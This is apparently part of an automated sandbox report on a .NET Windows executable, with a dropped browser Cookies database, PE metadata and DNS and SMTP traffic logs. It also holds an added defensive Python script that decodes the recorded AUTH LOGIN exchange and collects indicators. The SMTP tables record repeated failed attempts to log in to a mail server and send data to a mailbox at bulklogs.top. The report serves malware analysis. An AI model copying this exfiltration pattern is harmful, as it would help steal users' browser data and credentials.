                                                                                          Preview: PK.........K>Q............#...y2nzgw3x.tiq/Chrome/Default/Cookies..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"^......^dmz....~._...5~.4.5~._.......{~-......kz..=...1>........5~..8.5~..._.......~.......G...=?z~...........~._...m.......~.6.......y.?~..W..oN.7.O...............g/.~~.*}....W...U...o........}...y..\w?[e..Q.nU.y..h~.&...<..mW....Yf.e6.....y....s.......Iw..*...i.e......h..xm..^......<y..........a.hv......4....<_lh.3....O|u.n......Q.).sg....~......5..,.........u[....................e.Z.m...Z....-p../_|...N.}.!..|u....'..N..Q*d.......~...z.-....._......7.....?.k....o....=?z~.......G...=?z~.......G..+........s..L..%'.J0...H.T.....................E....6k...n.k .........M....?....=?z~.......G...=?z~.......G....;....@.....................2..1..k.&..A.....G...=?z~.......G...=?z....!......z?.[....c?F...?t.7.5.....o....?._T.E..).~q...q.w../....../ww............?.[........7i..
                                                                                          C:\Users\user\AppData\Roaming\y2nzgw3x.tiq\Chrome\Default\Cookies
                                                                                          Process:C:\Users\user\AppData\Local\Temp\nwama\nwama.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.7006690334145785
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBoe9H6pf1H1oNQ:T5LLOpEO5J/Kn7U1uBobfvoNQ
                                                                                          MD5:A7FE10DA330AD03BF22DC9AC76BBB3E4
                                                                                          SHA1:1805CB7A2208BAEFF71DCB3FE32DB0CC935CF803
                                                                                          SHA-256:8D6B84A96429B5C672838BF431A47EC59655E561EBFBB4E63B46351D10A7AAD8
                                                                                          SHA-512:1DBE27AED6E1E98E9F82AC1F5B774ACB6F3A773BEB17B66C2FB7B89D12AC87A6D5B716EF844678A5417F30EE8855224A8686A135876AB4C0561B3C6059E635C7
                                                                                          Malicious:false
                                                                                          Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          Static File Info

                                                                                          General

                                                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Entropy (8bit):7.046672193911453
                                                                                          TrID:
                                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                          • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                          • DOS Executable Generic (2002/1) 0.01%
                                                                                          File name:sample2.exe
                                                                                          File size:608768
                                                                                          MD5:b0f2d519ccae5bf1435264e0979770ce
                                                                                          SHA1:212da7b3ed9c89d83941f6bb0dba889fa24f8f6a
                                                                                          SHA256:a4fdc26d6b70eaf0a62cca36286412901f48881eae616d38b96d8ae0cb0f29c7
SHA512: a50b9d27abdf6195a2689ff911e11cbc6f71cbf69d1872c765a9fc92b3a2a8e2717e260c76d1c91576d59f6b105a27b1cccc6056251dc80a0dc8afecbff3507c
SSDEEP: 12288:o+zgiqlYVUUJiotHw9c93n5zzsO1E48Mjr0J42lX:bl3xScRRz71Eowim
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...8..^..............0..@..........._... ...`....@.. ....................................@................................

File Icon

Icon Hash: 00828e8e8686b000

Static PE Info

General

Entrypoint: 0x495f96
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp: 0x5E981D38 [Thu Apr 16 08:54:16 2020 UTC]
TLS Callbacks:
CLR (.Net) Version: v2.0.50727
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]

Data Directories

| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x95f44 | 0x4f | .text |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x96000 | 0x5fc | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x98000 | 0xc | .reloc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |

Sections

| Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|
| .text | 0x2000 | 0x93f9c | 0x94000 | False | 0.716264054582 | data | 7.05584068406 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ |
| .rsrc | 0x96000 | 0x5fc | 0x600 | False | 0.438151041667 | data | 4.24837573542 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0x98000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |

Resources

| Name | RVA | Size | Type | Language | Country |
|---|---|---|---|---|---|
| RT_VERSION | 0x96090 | 0x36c | data | | |
| RT_MANIFEST | 0x9640c | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | | |

Imports

| DLL | Import |
|---|---|
| mscoree.dll | _CorExeMain |

Version Infos

| Description | Data |
|---|---|
| Translation | 0x0000 0x04b0 |
| LegalCopyright | Copyright 2014 - 2020 |
| Assembly Version | 4.0.2.0 |
| InternalName | zEzEVogzGVZLHnuzSL.exe |
| FileVersion | 4.0.2.0 |
| CompanyName | |
| LegalTrademarks | |
| Comments | |
| ProductName | ControllerSets |
| ProductVersion | 4.0.2.0 |
| FileDescription | ControllerSets |
| OriginalFilename | zEzEVogzGVZLHnuzSL.exe |

Network Behavior

Network Port Distribution

TCP Packets


UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 14, 2021 03:37:32.869775057 CET | 55854 | 53 | 192.168.2.4 | 8.8.8.8
Jan 14, 2021 03:37:32.917884111 CET | 53 | 55854 | 8.8.8.8 | 192.168.2.4
Jan 14, 2021 03:37:33.825086117 CET | 64549 | 53 | 192.168.2.4 | 8.8.8.8
Jan 14, 2021 03:37:33.872987032 CET | 53 | 64549 | 8.8.8.8 | 192.168.2.4
Jan 14, 2021 03:37:35.021686077 CET | 63153 | 53 | 192.168.2.4 | 8.8.8.8
Jan 14, 2021 03:37:35.080501080 CET | 53 | 63153 | 8.8.8.8 | 192.168.2.4
Jan 14, 2021 03:37:36.235696077 CET | 52991 | 53 | 192.168.2.4 | 8.8.8.8
Jan 14, 2021 03:37:36.292154074 CET | 53 | 52991 | 8.8.8.8 | 192.168.2.4
Jan 14, 2021 03:37:37.114697933 CET | 53700 | 53 | 192.168.2.4 | 8.8.8.8
Jan 14, 2021 03:37:37.162817001 CET | 53 | 53700 | 8.8.8.8 | 192.168.2.4
Jan 14, 2021 03:37:38.049338102 CET | 51726 | 53 | 192.168.2.4 | 8.8.8.8
Jan 14, 2021 03:37:38.105707884 CET | 53 | 51726 | 8.8.8.8 | 192.168.2.4
Jan 14, 2021 03:37:39.018359900 CET | 56794 | 53 | 192.168.2.4 | 8.8.8.8
Jan 14, 2021 03:37:39.074843884 CET | 53 | 56794 | 8.8.8.8 | 192.168.2.4
Jan 14, 2021 03:37:39.992633104 CET | 56534 | 53 | 192.168.2.4 | 8.8.8.8
Jan 14, 2021 03:37:40.040813923 CET | 53 | 56534 | 8.8.8.8 | 192.168.2.4
Jan 14, 2021 03:37:40.919440031 CET | 56627 | 53 | 192.168.2.4 | 8.8.8.8
Jan 14, 2021 03:37:40.970345974 CET | 53 | 56627 | 8.8.8.8 | 192.168.2.4
Jan 14, 2021 03:37:41.781959057 CET | 56621 | 53 | 192.168.2.4 | 8.8.8.8
Jan 14, 2021 03:37:41.832847118 CET | 53 | 56621 | 8.8.8.8 | 192.168.2.4
Jan 14, 2021 03:37:42.736428022 CET | 63116 | 53 | 192.168.2.4 | 8.8.8.8
Jan 14, 2021 03:37:42.784553051 CET | 53 | 63116 | 8.8.8.8 | 192.168.2.4
Jan 14, 2021 03:37:43.726118088 CET | 64078 | 53 | 192.168.2.4 | 8.8.8.8
Jan 14, 2021 03:37:43.776962042 CET | 53 | 64078 | 8.8.8.8 | 192.168.2.4
Jan 14, 2021 03:37:55.673203945 CET | 64801 | 53 | 192.168.2.4 | 8.8.8.8
Jan 14, 2021 03:37:55.721537113 CET | 53 | 64801 | 8.8.8.8 | 192.168.2.4
Jan 14, 2021 03:37:59.766006947 CET | 61721 | 53 | 192.168.2.4 | 8.8.8.8
Jan 14, 2021 03:37:59.824593067 CET | 53 | 61721 | 8.8.8.8 | 192.168.2.4
Jan 14, 2021 03:38:13.161227942 CET | 51255 | 53 | 192.168.2.4 | 8.8.8.8
Jan 14, 2021 03:38:13.278912067 CET | 53 | 51255 | 8.8.8.8 | 192.168.2.4
Jan 14, 2021 03:38:13.854940891 CET | 61522 | 53 | 192.168.2.4 | 8.8.8.8
Jan 14, 2021 03:38:13.920804024 CET | 53 | 61522 | 8.8.8.8 | 192.168.2.4
Jan 14, 2021 03:38:14.537789106 CET | 52337 | 53 | 192.168.2.4 | 8.8.8.8
Jan 14, 2021 03:38:14.594098091 CET | 53 | 52337 | 8.8.8.8 | 192.168.2.4
Jan 14, 2021 03:38:15.246191025 CET | 55046 | 53 | 192.168.2.4 | 8.8.8.8
Jan 14, 2021 03:38:15.282701969 CET | 49612 | 53 | 192.168.2.4 | 8.8.8.8
Jan 14, 2021 03:38:15.310538054 CET | 53 | 55046 | 8.8.8.8 | 192.168.2.4
Jan 14, 2021 03:38:15.338891983 CET | 53 | 49612 | 8.8.8.8 | 192.168.2.4
Jan 14, 2021 03:38:15.963510036 CET | 49285 | 53 | 192.168.2.4 | 8.8.8.8
Jan 14, 2021 03:38:16.019995928 CET | 53 | 49285 | 8.8.8.8 | 192.168.2.4
Jan 14, 2021 03:38:16.780508041 CET | 50601 | 53 | 192.168.2.4 | 8.8.8.8
Jan 14, 2021 03:38:16.841895103 CET | 53 | 50601 | 8.8.8.8 | 192.168.2.4
Jan 14, 2021 03:38:17.578084946 CET | 60875 | 53 | 192.168.2.4 | 8.8.8.8
Jan 14, 2021 03:38:17.637299061 CET | 53 | 60875 | 8.8.8.8 | 192.168.2.4
Jan 14, 2021 03:38:18.742748022 CET | 56448 | 53 | 192.168.2.4 | 8.8.8.8
Jan 14, 2021 03:38:18.799222946 CET | 53 | 56448 | 8.8.8.8 | 192.168.2.4
Jan 14, 2021 03:38:19.939304113 CET | 59172 | 53 | 192.168.2.4 | 8.8.8.8
Jan 14, 2021 03:38:19.998245001 CET | 53 | 59172 | 8.8.8.8 | 192.168.2.4
Jan 14, 2021 03:38:20.532008886 CET | 62420 | 53 | 192.168.2.4 | 8.8.8.8
Jan 14, 2021 03:38:20.579864025 CET | 53 | 62420 | 8.8.8.8 | 192.168.2.4
Jan 14, 2021 03:38:21.248097897 CET | 60579 | 53 | 192.168.2.4 | 8.8.8.8
Jan 14, 2021 03:38:21.314516068 CET | 53 | 60579 | 8.8.8.8 | 192.168.2.4
Jan 14, 2021 03:38:21.361242056 CET | 50183 | 53 | 192.168.2.4 | 8.8.8.8
Jan 14, 2021 03:38:21.409131050 CET | 53 | 50183 | 8.8.8.8 | 192.168.2.4
Jan 14, 2021 03:38:32.267143965 CET | 61531 | 53 | 192.168.2.4 | 8.8.8.8
Jan 14, 2021 03:38:32.327753067 CET | 53 | 61531 | 8.8.8.8 | 192.168.2.4
Jan 14, 2021 03:38:42.216233015 CET | 49228 | 53 | 192.168.2.4 | 8.8.8.8
Jan 14, 2021 03:38:42.275471926 CET | 53 | 49228 | 8.8.8.8 | 192.168.2.4
Jan 14, 2021 03:38:49.480362892 CET | 59794 | 53 | 192.168.2.4 | 8.8.8.8
Jan 14, 2021 03:38:49.536833048 CET | 53 | 59794 | 8.8.8.8 | 192.168.2.4
Jan 14, 2021 03:39:04.936846018 CET | 55916 | 53 | 192.168.2.4 | 8.8.8.8
Jan 14, 2021 03:39:04.985095024 CET | 53 | 55916 | 8.8.8.8 | 192.168.2.4

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jan 14, 2021 03:38:21.248097897 CET | 192.168.2.4 | 8.8.8.8 | 0xa34 | Standard query (0) | us2.smtp.mailhostbox.com | A (IP address) | IN (0x0001)
Jan 14, 2021 03:38:42.216233015 CET | 192.168.2.4 | 8.8.8.8 | 0xf9fb | Standard query (0) | us2.smtp.mailhostbox.com | A (IP address) | IN (0x0001)
Jan 14, 2021 03:38:49.480362892 CET | 192.168.2.4 | 8.8.8.8 | 0xb926 | Standard query (0) | us2.smtp.mailhostbox.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jan 14, 2021 03:38:21.314516068 CET | 8.8.8.8 | 192.168.2.4 | 0xa34 | No error (0) | us2.smtp.mailhostbox.com |  | 208.91.198.143 | A (IP address) | IN (0x0001)
Jan 14, 2021 03:38:21.314516068 CET | 8.8.8.8 | 192.168.2.4 | 0xa34 | No error (0) | us2.smtp.mailhostbox.com |  | 208.91.199.223 | A (IP address) | IN (0x0001)
Jan 14, 2021 03:38:21.314516068 CET | 8.8.8.8 | 192.168.2.4 | 0xa34 | No error (0) | us2.smtp.mailhostbox.com |  | 208.91.199.225 | A (IP address) | IN (0x0001)
Jan 14, 2021 03:38:21.314516068 CET | 8.8.8.8 | 192.168.2.4 | 0xa34 | No error (0) | us2.smtp.mailhostbox.com |  | 208.91.199.224 | A (IP address) | IN (0x0001)
Jan 14, 2021 03:38:42.275471926 CET | 8.8.8.8 | 192.168.2.4 | 0xf9fb | No error (0) | us2.smtp.mailhostbox.com |  | 208.91.198.143 | A (IP address) | IN (0x0001)
Jan 14, 2021 03:38:42.275471926 CET | 8.8.8.8 | 192.168.2.4 | 0xf9fb | No error (0) | us2.smtp.mailhostbox.com |  | 208.91.199.223 | A (IP address) | IN (0x0001)
Jan 14, 2021 03:38:42.275471926 CET | 8.8.8.8 | 192.168.2.4 | 0xf9fb | No error (0) | us2.smtp.mailhostbox.com |  | 208.91.199.224 | A (IP address) | IN (0x0001)
Jan 14, 2021 03:38:42.275471926 CET | 8.8.8.8 | 192.168.2.4 | 0xf9fb | No error (0) | us2.smtp.mailhostbox.com |  | 208.91.199.225 | A (IP address) | IN (0x0001)
Jan 14, 2021 03:38:49.536833048 CET | 8.8.8.8 | 192.168.2.4 | 0xb926 | No error (0) | us2.smtp.mailhostbox.com |  | 208.91.198.143 | A (IP address) | IN (0x0001)
Jan 14, 2021 03:38:49.536833048 CET | 8.8.8.8 | 192.168.2.4 | 0xb926 | No error (0) | us2.smtp.mailhostbox.com |  | 208.91.199.223 | A (IP address) | IN (0x0001)
Jan 14, 2021 03:38:49.536833048 CET | 8.8.8.8 | 192.168.2.4 | 0xb926 | No error (0) | us2.smtp.mailhostbox.com |  | 208.91.199.225 | A (IP address) | IN (0x0001)
Jan 14, 2021 03:38:49.536833048 CET | 8.8.8.8 | 192.168.2.4 | 0xb926 | No error (0) | us2.smtp.mailhostbox.com |  | 208.91.199.224 | A (IP address) | IN (0x0001)
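
The DNS answers above give four A records for the mail host the sample resolves, and the SMTP sessions recorded in the next table show it authenticating to that host on port 587 with AUTH LOGIN before the server rejects both the login (535) and the relay (554). The script below is an added example; it is not part of the Joe Sandbox report and not code from the sample. It replays one of those sessions from the command strings in this report (a constructed server/client transcript, not a pcap parser), decodes the base64 SASL tokens, and collects the indicators an analyst would block. The function names, the "S"/"C" transcript format and the result keys are this example's own.

```python
"""Decode the SMTP AUTH LOGIN exfiltration attempt recorded in this report."""
import base64
import binascii
import re

# Constructed from the DNS Answers and SMTP Packets rows of this report
# (client 192.168.2.4 -> 208.91.198.143:587). Only the Commands column is
# reproduced: "S" marks a server line, "C" a client line.
DNS_ANSWERS = [
    ("us2.smtp.mailhostbox.com", "208.91.198.143"),
    ("us2.smtp.mailhostbox.com", "208.91.199.223"),
    ("us2.smtp.mailhostbox.com", "208.91.199.225"),
    ("us2.smtp.mailhostbox.com", "208.91.199.224"),
]
SMTP_SESSION = [
    ("S", "220 us2.outbound.mailhostbox.com ESMTP Postfix"),
    ("C", "EHLO 445817"),
    ("S", "250-us2.outbound.mailhostbox.com"),
    ("S", "250-STARTTLS"),
    ("S", "250-AUTH PLAIN LOGIN"),
    ("S", "250 DSN"),
    ("C", "AUTH login bndhbWFAYnVsa2xvZ3MudG9w"),
    ("S", "334 UGFzc3dvcmQ6"),
    ("S", "535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6"),
    ("C", "MAIL FROM:<nwama@bulklogs.top>"),
    ("S", "250 2.1.0 Ok"),
    ("C", "RCPT TO:<nwama@bulklogs.top>"),
    ("S", "554 5.7.1 <nwama@bulklogs.top>: Relay access denied"),
]

_ANGLE_ADDR = re.compile(r"<([^>]+)>")


def b64_text(token):
    """Decode one base64 SASL token to text, or return None if it is not base64."""
    padded = token + "=" * (-len(token) % 4)
    try:
        return base64.b64decode(padded, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None


def parse_session(lines):
    """Walk one SMTP session and record what the client revealed and how the server replied."""
    s = {
        "ehlo": None, "starttls_offered": False, "starttls_sent": False,
        "auth_mech": None, "auth_user": None, "challenges": [],
        "auth_failed": False, "mail_from": None, "rcpt_to": [],
        "relay_denied": False,
    }
    for side, line in lines:
        verb, _, rest = line.partition(" ")
        if side == "C":
            verb = verb.upper()
            if verb == "EHLO":
                s["ehlo"] = rest
            elif verb == "STARTTLS":
                s["starttls_sent"] = True
            elif verb == "AUTH":
                mech, _, initial = rest.partition(" ")
                s["auth_mech"] = mech.upper()
                # For AUTH LOGIN the optional initial response is the base64 username.
                if s["auth_mech"] == "LOGIN" and initial:
                    s["auth_user"] = b64_text(initial)
            elif verb == "MAIL":
                m = _ANGLE_ADDR.search(rest)
                s["mail_from"] = m.group(1) if m else None
            elif verb == "RCPT":
                m = _ANGLE_ADDR.search(rest)
                if m:
                    s["rcpt_to"].append(m.group(1))
        else:
            code = verb[:3]
            if line.upper().startswith(("250-STARTTLS", "250 STARTTLS")):
                s["starttls_offered"] = True
            elif code == "334":          # SASL challenge, base64 ("Password:")
                s["challenges"].append(b64_text(rest))
            elif code == "535":          # authentication failed
                s["auth_failed"] = True
            elif code == "554" and "relay access denied" in rest.lower():
                s["relay_denied"] = True
    return s


def iocs(dns_answers, session):
    """Collect the indicators an analyst would block or hunt on."""
    addrs = [session["auth_user"], session["mail_from"], *session["rcpt_to"]]
    return {
        "smtp_host": sorted({name for name, _ in dns_answers}),
        "smtp_ips": sorted({ip for _, ip in dns_answers}),
        "exfil_mailbox": sorted({a for a in addrs if a}),
        # AUTH was sent although STARTTLS was advertised and never issued.
        "cleartext_auth": session["auth_mech"] is not None and not session["starttls_sent"],
    }


if __name__ == "__main__":
    session = parse_session(SMTP_SESSION)
    for key, value in iocs(DNS_ANSWERS, session).items():
        print(f"{key:15} {value}")
    print("challenge decoded:", session["challenges"])
```

AUTH LOGIN only base64-encodes the username and the server's "Password:" prompt; it is an encoding, not encryption, and the client never issued STARTTLS after the server advertised it, so the mailbox name crossed the wire in the clear on port 587. The report records no client line between the 334 challenge and the 535 rejection, so the parser does not assume one; blocking all four resolved addresses rather than only 208.91.198.143 matters because the answers are round-robin and a later run may pick a different one.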

SMTP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Jan 14, 2021 03:38:22.217010975 CET | 587 | 49760 | 208.91.198.143 | 192.168.2.4 | 220 us2.outbound.mailhostbox.com ESMTP Postfix
Jan 14, 2021 03:38:22.217643023 CET | 49760 | 587 | 192.168.2.4 | 208.91.198.143 | EHLO 445817
Jan 14, 2021 03:38:22.392225027 CET | 587 | 49760 | 208.91.198.143 | 192.168.2.4 | 250-us2.outbound.mailhostbox.com
    250-PIPELINING
    250-SIZE 41648128
    250-VRFY
    250-ETRN
    250-STARTTLS
    250-AUTH PLAIN LOGIN
    250-AUTH=PLAIN LOGIN
    250-ENHANCEDSTATUSCODES
    250-8BITMIME
    250 DSN
Jan 14, 2021 03:38:22.392793894 CET | 49760 | 587 | 192.168.2.4 | 208.91.198.143 | AUTH login bndhbWFAYnVsa2xvZ3MudG9w
Jan 14, 2021 03:38:22.567864895 CET | 587 | 49760 | 208.91.198.143 | 192.168.2.4 | 334 UGFzc3dvcmQ6
Jan 14, 2021 03:38:24.347907066 CET | 587 | 49760 | 208.91.198.143 | 192.168.2.4 | 535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
Jan 14, 2021 03:38:24.349411964 CET | 49760 | 587 | 192.168.2.4 | 208.91.198.143 | MAIL FROM:<nwama@bulklogs.top>
Jan 14, 2021 03:38:24.524710894 CET | 587 | 49760 | 208.91.198.143 | 192.168.2.4 | 250 2.1.0 Ok
Jan 14, 2021 03:38:24.524949074 CET | 49760 | 587 | 192.168.2.4 | 208.91.198.143 | RCPT TO:<nwama@bulklogs.top>
Jan 14, 2021 03:38:24.704446077 CET | 587 | 49760 | 208.91.198.143 | 192.168.2.4 | 554 5.7.1 <nwama@bulklogs.top>: Relay access denied
Jan 14, 2021 03:38:25.406002045 CET | 587 | 49761 | 208.91.198.143 | 192.168.2.4 | 220 us2.outbound.mailhostbox.com ESMTP Postfix
Jan 14, 2021 03:38:25.406280041 CET | 49761 | 587 | 192.168.2.4 | 208.91.198.143 | EHLO 445817
Jan 14, 2021 03:38:25.579510927 CET | 587 | 49761 | 208.91.198.143 | 192.168.2.4 | 250-us2.outbound.mailhostbox.com
    250-PIPELINING
    250-SIZE 41648128
    250-VRFY
    250-ETRN
    250-STARTTLS
    250-AUTH PLAIN LOGIN
    250-AUTH=PLAIN LOGIN
    250-ENHANCEDSTATUSCODES
    250-8BITMIME
    250 DSN
Jan 14, 2021 03:38:25.579762936 CET | 49761 | 587 | 192.168.2.4 | 208.91.198.143 | AUTH login bndhbWFAYnVsa2xvZ3MudG9w
Jan 14, 2021 03:38:25.753851891 CET | 587 | 49761 | 208.91.198.143 | 192.168.2.4 | 334 UGFzc3dvcmQ6
Jan 14, 2021 03:38:27.434658051 CET | 587 | 49761 | 208.91.198.143 | 192.168.2.4 | 535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
Jan 14, 2021 03:38:27.434890032 CET | 49761 | 587 | 192.168.2.4 | 208.91.198.143 | MAIL FROM:<nwama@bulklogs.top>
Jan 14, 2021 03:38:27.608792067 CET | 587 | 49761 | 208.91.198.143 | 192.168.2.4 | 250 2.1.0 Ok
Jan 14, 2021 03:38:27.609004021 CET | 49761 | 587 | 192.168.2.4 | 208.91.198.143 | RCPT TO:<nwama@bulklogs.top>
Jan 14, 2021 03:38:27.786582947 CET | 587 | 49761 | 208.91.198.143 | 192.168.2.4 | 554 5.7.1 <nwama@bulklogs.top>: Relay access denied
Jan 14, 2021 03:38:42.650516987 CET | 587 | 49767 | 208.91.198.143 | 192.168.2.4 | 220 us2.outbound.mailhostbox.com ESMTP Postfix
Jan 14, 2021 03:38:42.651597977 CET | 49767 | 587 | 192.168.2.4 | 208.91.198.143 | EHLO 445817
Jan 14, 2021 03:38:42.826545000 CET | 587 | 49767 | 208.91.198.143 | 192.168.2.4 | 250-us2.outbound.mailhostbox.com
    250-PIPELINING
    250-SIZE 41648128
    250-VRFY
    250-ETRN
    250-STARTTLS
    250-AUTH PLAIN LOGIN
    250-AUTH=PLAIN LOGIN
    250-ENHANCEDSTATUSCODES
    250-8BITMIME
    250 DSN
Jan 14, 2021 03:38:42.828066111 CET | 49767 | 587 | 192.168.2.4 | 208.91.198.143 | AUTH login bndhbWFAYnVsa2xvZ3MudG9w
Jan 14, 2021 03:38:43.003906012 CET | 587 | 49767 | 208.91.198.143 | 192.168.2.4 | 334 UGFzc3dvcmQ6
Jan 14, 2021 03:38:45.320012093 CET | 587 | 49767 | 208.91.198.143 | 192.168.2.4 | 535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
Jan 14, 2021 03:38:45.617290974 CET | 49767 | 587 | 192.168.2.4 | 208.91.198.143 | MAIL FROM:<nwama@bulklogs.top>
Jan 14, 2021 03:38:45.792956114 CET | 587 | 49767 | 208.91.198.143 | 192.168.2.4 | 250 2.1.0 Ok
Jan 14, 2021 03:38:45.797069073 CET | 49767 | 587 | 192.168.2.4 | 208.91.198.143 | RCPT TO:<nwama@bulklogs.top>
Jan 14, 2021 03:38:45.976691961 CET | 587 | 49767 | 208.91.198.143 | 192.168.2.4 | 554 5.7.1 <nwama@bulklogs.top>: Relay access denied
Jan 14, 2021 03:38:47.283478975 CET | 587 | 49768 | 208.91.198.143 | 192.168.2.4 | 220 us2.outbound.mailhostbox.com ESMTP Postfix
Jan 14, 2021 03:38:47.283776999 CET | 49768 | 587 | 192.168.2.4 | 208.91.198.143 | EHLO 445817
Jan 14, 2021 03:38:47.457199097 CET | 587 | 49768 | 208.91.198.143 | 192.168.2.4 | 250-us2.outbound.mailhostbox.com
    250-PIPELINING
    250-SIZE 41648128
    250-VRFY
    250-ETRN
    250-STARTTLS
    250-AUTH PLAIN LOGIN
    250-AUTH=PLAIN LOGIN
    250-ENHANCEDSTATUSCODES
    250-8BITMIME
    250 DSN
Jan 14, 2021 03:38:47.457685947 CET | 49768 | 587 | 192.168.2.4 | 208.91.198.143 | AUTH login bndhbWFAYnVsa2xvZ3MudG9w
Jan 14, 2021 03:38:47.632039070 CET | 587 | 49768 | 208.91.198.143 | 192.168.2.4 | 334 UGFzc3dvcmQ6
Jan 14, 2021 03:38:49.348474979 CET | 587 | 49768 | 208.91.198.143 | 192.168.2.4 | 535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
Jan 14, 2021 03:38:49.349335909 CET | 49768 | 587 | 192.168.2.4 | 208.91.198.143 | MAIL FROM:<nwama@bulklogs.top>
Jan 14, 2021 03:38:49.523422003 CET | 587 | 49768 | 208.91.198.143 | 192.168.2.4 | 250 2.1.0 Ok
Jan 14, 2021 03:38:49.540004969 CET | 49768 | 587 | 192.168.2.4 | 208.91.198.143 | RCPT TO:<nwama@bulklogs.top>
Jan 14, 2021 03:38:49.718399048 CET | 587 | 49768 | 208.91.198.143 | 192.168.2.4 | 554 5.7.1 <nwama@bulklogs.top>: Relay access denied
Jan 14, 2021 03:38:49.937963963 CET | 587 | 49769 | 208.91.198.143 | 192.168.2.4 | 220 us2.outbound.mailhostbox.com ESMTP Postfix
Jan 14, 2021 03:38:49.939066887 CET | 49769 | 587 | 192.168.2.4 | 208.91.198.143 | EHLO 445817
Jan 14, 2021 03:38:50.114243984 CET | 587 | 49769 | 208.91.198.143 | 192.168.2.4 | 250-us2.outbound.mailhostbox.com
    250-PIPELINING
    250-SIZE 41648128
    250-VRFY
    250-ETRN
    250-STARTTLS
    250-AUTH PLAIN LOGIN
    250-AUTH=PLAIN LOGIN
    250-ENHANCEDSTATUSCODES
    250-8BITMIME
    250 DSN
Jan 14, 2021 03:38:50.115310907 CET | 49769 | 587 | 192.168.2.4 | 208.91.198.143 | AUTH login bndhbWFAYnVsa2xvZ3MudG9w
Jan 14, 2021 03:38:50.291225910 CET | 587 | 49769 | 208.91.198.143 | 192.168.2.4 | 334 UGFzc3dvcmQ6
Jan 14, 2021 03:38:52.550067902 CET | 587 | 49769 | 208.91.198.143 | 192.168.2.4 | 535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
Jan 14, 2021 03:38:52.553708076 CET | 49769 | 587 | 192.168.2.4 | 208.91.198.143 | MAIL FROM:<nwama@bulklogs.top>
Jan 14, 2021 03:38:52.729701042 CET | 587 | 49769 | 208.91.198.143 | 192.168.2.4 | 250 2.1.0 Ok
Jan 14, 2021 03:38:52.730365992 CET | 49769 | 587 | 192.168.2.4 | 208.91.198.143 | RCPT TO:<nwama@bulklogs.top>
Jan 14, 2021 03:38:52.910880089 CET | 587 | 49769 | 208.91.198.143 | 192.168.2.4 | 554 5.7.1 <nwama@bulklogs.top>: Relay access denied
